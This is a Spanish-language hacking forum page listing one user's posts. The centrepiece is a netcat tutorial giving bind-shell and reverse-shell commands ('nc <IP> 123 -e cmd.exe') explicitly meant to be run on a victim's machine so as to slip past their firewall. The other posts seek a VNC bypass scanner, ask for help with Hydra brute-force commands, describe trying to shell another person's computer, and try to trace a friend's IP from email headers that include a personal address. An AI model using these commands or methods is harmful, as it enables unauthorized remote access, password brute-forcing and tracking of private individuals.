elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / [Urgente] VNC bypass & IP Gmail en: 10 Enero 2010, 16:30 pm
Hola, quería saber si alguien tiene ese programa, para ver si un rango de IP's es vulnerable con VNC (Ej.:4.1)

Busco el programa del siguiente vídeo

http://www.youtube.com/watch?v=4JNkq21pxwI

Aver si me lo podeis pasar  :D

Mi otra duda es que yo uso el cliente de correo Hotmail, y una persona que conozco usa Gmail el caso es que me envió una serie de emails con archivos adjuntos y me gustaría saber su IP, le di a ver el código fuente para ver si salía la IP de la persona que lo envió pero creo que me sale una que no creo que sea   :rolleyes:

Os pongo lo que me salió cuando le di a Código Fuente, para ver si me podéis ayudar  :P

Citar
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtTQ0w9MA==

X-Message-Status: n:0

X-SID-PRA: Amigo <Correo_Gmail@gmail.com>

X-SID-Result: Pass

X-Message-Info: JGTYoYF78jG9ZXbx0t2orl7gktoGw8q8/wJV5TYJJbahTX/c58YRiItpTE72Q8og5jJ8redmsLkK0doKNyJWwfcugsd0XGry

Received: from mail-fx0-f227.google.com ([209.85.220.227]) by SNT0-MC1-F4.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);

    Wed, Fecha 04:53:14 -0800

Received: by mail-fx0-f227.google.com with SMTP id 27so7473918fxm.3

        for <rubenmolga1@hotmail.com>; Wed, 23 Dec 2009 04:53:14 -0800 (PST)

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;

        d=gmail.com; s=gamma;

        h=domainkey-signature:mime-version:received:in-reply-to:references

         :from:date:message-id:subject:content-type;

        bh=lFbYX9h5+qjA8u6NIEZ1u7XCiIzl5cpg2tB8bLtyGvg=;

        b=vidPYawi9DU/VQT4QUOlQA3MrIpjqo1zpIpl1DxrjZec0C1NYws/lYRCEq45DUz3gM

         WtRVvvHcEMsu54nPnHJYwKsiA3ULhmWTUnhvjg3NYcZyc2TaEf7B+R0DGEQpCw8DkPIQ

         WS70F/QB88FL7T3OI3d6ReqEuvBoY5V7LKqlI=

DomainKey-Signature: a=rsa-sha1; c=nofws;

        d=gmail.com; s=gamma;

        h=mime-version:in-reply-to:references:from:date:message-id:subject

         :content-type;

        b=QvzwaYzQhiTNdeK6E9IosGGPS7e1ksdTOoScZ2rjPeawVLqEL1O712AsPjb+/Nex76

         ONouQytCmI+Gzwb1v+CtiIwrne7QKVvIL64CuOtzEJuM/OdfC+9uWisZ35IBN5yhpf8a

         ApLM27nq43yk2stG/jOC0FELkkTixlSWpMCkw=

MIME-Version: 1.0

Received: by 10.103.127.29 with SMTP id e29mt4653043mun.79.1261572791944; Wed,

   Fecha -0800 (PST)

In-Reply-To: <43419f320912230441u797eb0e5m3e1096da3ea9bbed@mail.gmail.com>

References: <SNT133-w40649E652A42868435FC4596800@phx.gbl> <43419f320912230441u797eb0e5m3e1096da3ea9bbed@mail.gmail.com>

From: Amigo <Cuenta_Gmail@gmail.com>

Date: Fecha 13:52:51 +0100

Message-ID: <43419f320912230452j188ecffs7f51dc65ef28e8e9@mail.gmail.com>

Subject:

Content-Type: multipart/mixed; boundary=0016e65a10183897d7047b64cec4

Bcc:

Return-Path: cuenta_Gmail@gmail.com

X-OriginalArrivalTime: 23 Dec 2009 12:53:14.0638 (UTC) FILETIME=[E41232E0:01CA83CE]



--0016e65a10183897d7047b64cec4

Content-Type: multipart/alternative; boundary=0016e65a10183897cc047b64cec2



--0016e65a10183897cc047b64cec2

Content-Type: text/plain; charset=ISO-8859-1

Content-Transfer-Encoding: quoted-printable



"Más mensaje"



"Mensje"=

=E1

Mensaje



--0016e65a10183897cc047b64cec2

Content-Type: text/html; charset=ISO-8859-1

Content-Transfer-Encoding: quoted-printable



<div>"Mensaje enviado"! </=

div>

<div>=A0</div>

<div>Más mensaje =

ser=Más mensaje!</div>



--0016e65a10183897cc047b64cec2--

--0016e65a10183897d7047b64cec4

Content-Type: image/jpeg; name="imagen.jpg"

Content-Disposition: attachment; filename="imagen.JPG"

Content-Transfer-Encoding: base64

X-Attachment-Id: f_g3k3envq0



/9j/4V/SRXhpZgAATU0AKgAAAAgACwEPAAIAAAAYAAAAkgEQAAIAAAAIAAAAqgESAAMAAAABAAEA

AAEaAAUAAAABAAAAsgEbAAUAAAABAAAAugEoAAMAAAABAAIAAAExAAIAAAAWAAAAwgEyAAIAAAAU

Sigue con esa secuencia de letras

Obviamente quite los datos personales de mi amigo como Cuenta de Correo, Nombre y apellidos, y también la fecha del envio

Aver si me podeis ayudar  :)

Saludos!
2  Seguridad Informática / Hacking / Conseguir Shell con Netcat en: 10 Enero 2010, 15:25 pm
Conseguir Shell en Netcat

Autor: Pyr0s
Foro: Evolution

Hay dos maneras de conseguir shell por conexión directa o inversa, mostraré las dos pero os aconsejo que useis la inversa ya que os saltais unos cuantos firewalls  

Conexión Directa

En este tipo de conexión tú te conectas a la victima, el funcionamiento sería el siguiente:


Citar
nc -l -p 123 -e cmd.exe

-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto
-e: Permite ejecutar un comando, en nuestro caso cmd.exe (Shell)

Ese sería el comando que tendría que ejecutar la víctima


Citar
Telnet 192.168.1.33 123

Y ahi es donde nosotros nos tendríamos que conectar, entonces ya tendriamos Shell  

Inversa


Citar
nc -v -l -p 123

-v: Informa del estado de Netcat
-l:Activa el modo escucha de nc
-P: Permite a nc elegir el puerto

Esos serían los comandos que tenemos que teclear, mientras que nuestra víctima tiene que ejcutar los siguientes comandos


Citar
nc 192.168.1.33 123 -e cmd.exe

Con lo que la Shell la consigue el usuario que esta en escucha en este caso nosotros, y asi tenemos shell y evitamos que no salte el firewall de nuestra victima  

Esto es todo, espero que os haya gustado el tutorial    :P

Saludos!
3  Seguridad Informática / Hacking / Problema con Hydra en: 8 Diciembre 2009, 22:18 pm
Hola otra vez xD. Vereis tengo un problema con Hydra he buscado por google pero no hay casi tutos asique hice un hydra -h y me puse a ello xD. El caso es que cuando pongo en la consola

Hydra -l password.txt -p password.txt -e ns -o Test.txt -t 10 -vV [IP] ftp

Me sale lo siguiente (el espacio negro después del -vV es la IP, solo que preferí no enseñarla)



¿Porqué me sale ese error? no se si tiene algo que ver pero tengo una conexión Wi-fi

Otro fallo que me sale es cuando pongo http-get, donde me pone:

Citar
C:\Documents and Settings\Ruben\Escritorio\hydra>Hydra -l password.txt -p password.txt -e ns -o Test.txt -t 10 -vV 173.*.*.* http-get
Error: You must supply the web page as an additional option or via -m

Si aparte de resolverme la duda alguien tiene un tutorial sobre todas las opciones de Hydra se lo agradecería  :)

Saludos!
4  Seguridad Informática / Hacking / Problema con Netcat en: 7 Diciembre 2009, 15:50 pm
Hola buenas, vereis tengo una duda sobre Netcat vereis pretendo conseguir shell en el ordenador de una persona mediante Netcat y una conexión Inversa es decir que el se conecte a mi y asi evito que salte el Firewall de mi víctima  ;D , pero me surge un problema como se donde esta nc para que al activar el codigo:

"nc 192.168.*.* 666 -e cmd.exe"

Y que asi se conecte a mi ordenador con el código:

"nc  -v -l -p 666"

Es que si no se donde lo guarda no puedo usar ese comando y por ello no me puedo conectar  :-\. Gracias por la ayuda

Saludos!
5  Seguridad Informática / Nivel Web / ¿Cuá es el más usado? en: 30 Noviembre 2009, 20:54 pm
Hola buenas, querría hacer una especir de encuesta sobre cual es el bug que más explotan los usuarios de Elhacker.net, para hacer una encuesta sobre cuales son los más usados.

La encuesta es simple, aveis de responder cual es el bug que más usais a nivel web, (RFI, LFI, SQL Injection, XSS) y una vez tenga la encuesta contrastada con otros foros "Underground" mostraré cual ha sido la vulnerabilidad más explotada y/o más usada en 2009.

Desde ya gracias por la colaboración.

Saludos!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines